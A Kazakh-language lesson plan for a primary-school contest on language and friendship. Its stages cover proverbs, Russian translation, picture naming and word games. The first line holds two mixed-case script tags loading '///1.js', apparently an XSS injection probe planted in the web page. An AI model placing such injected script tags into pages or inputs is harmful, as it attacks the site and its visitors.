<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.02.2017

                    Тақырып: «Тіл достық тірегі»

Тәрбие

сағатының мақсаты:

Білімділік: Тіл туралы

білімізді кеңейту, мақал – мәтелдер арқылы танымдылық қабілетімізді шыңдау,

сөздік қорымызды молайту

Тәрбиелік: Оқушыларды қазақ елін, қазақ тілін қастерлеуге, ой -

өрісін кеңейтуге, шешендік өнердің қыр – сырын ұғына білуге тәрбиелеу. Тілдің

қоғам өміріндегі маңызын ұғындыру.

Дамытушылық: Орындалатын

тапсырмалар арқылы оқушылардың ой-өрістерін дамыту шығармашылық қабілеттерін дамыту.

Көрнекіліктер: проектор; мақалдар,суреттер.


      Барысы:

1.Ұйымдастыру бөлімі..

Сәлеметсіңдер ме, балалар! Бүгін бізде ерекше

күн.

 Біз «Тіл – достық тірегі» атты іс-шарамыз негізінде

сайыс түрінде өтеді.

 -Сонымен ойынымызды бастаймыз!

Бүгінгі сайысымыз екі топ

арасында өтеді. Олар: 1-4 сыныптар. 

1 топ – қояндар

2 топ-  аюлар

 

1 кезең- «Мақал –сөздің мәйегі» тақырыбына байланысты әр топқа 3 мақалдан

беріледі. Сол мақалдарды құрастырады.

Отан отбасынан басталады

Мектеп –кеме, Білім –теңіз

Отансыз адам, Ормансыз бұлбұл.

2кезең- «Екітілдік –өмір талабы». Бір сөзден алып орысша аударады .

(адам, оқушы, қалам, парта, сынып, бала,

мұғалім,мектеп, табиғат, қазақ тілі, орыс тілі, дәптер, үй, сабақ, алма, шие,

сүт, қант, кәмпит, нан, жолбарыс, қасқыр, көйлек, шаш, бас, көз, қол, аяқ,

асхана)

 

3 - кезең « Сурет сайысы» - слайдтар.-

9 сурет.

(балалар  үй жануарлар  және жабайы аңдарды қазақша айтуға  тиіс)

 

4 кезең – «Би сайысы» - Сергіту

сәті.

 

5- кезең «Аяқталмаған сөйлем» Топтарға таратпаларға бір сөздері жоқ сөйлемдер

таратылады. Оқушылар сол сөйлемдерді аяқтап, жауабын оқиды.

1)Бүгін бізде бес сабақ ... .

2)Мен таңертең жаттығу ... .

3)Астана – жас ... .

4)Менің Отаным - ... .

5) Ғани ақылды ......

6) Қыс айлары: желтоқсан, .............,

...................   .

 

6- кезең - «Сыр сандық» Балалар сандықтар әр түрлі парақшаларды алады.

Сол парақшаларда тапсырмалар болады. Әр оқушы өз парақшасындағы сұрағына жауап

береді.

Ай аттарын ата

Апта күндерін ата

Жемістерді ата

Азық-түліктерді ата

Үй жануарларын ата

Аңдарды ата

Оқу құралдарын ата

Отбасы мүшелерін ата

Жыл мезгілдерін ата

Көкөністерді ата

Ойыншықтарды ата

Түстерді ата

7-кезең- « Сөзден сөз туар» Тақтаға екі топқа бірдей сөз жазылады. Оқушылар

сол сөзден не барынша көп сөз жасаулары керек. 

«ҚАРЛЫҒАШТАРДЫҢ»

 

Барлық қазақша мультфильм көреді.

 Жеңімпаз топты

марапттаймыз.

 

Іс-шарамыз аяқталды. Назарларыңа

көптеген рақмет!

Просмотров: 738


Пікір қосу



Деректерді қолтаңбаға қосу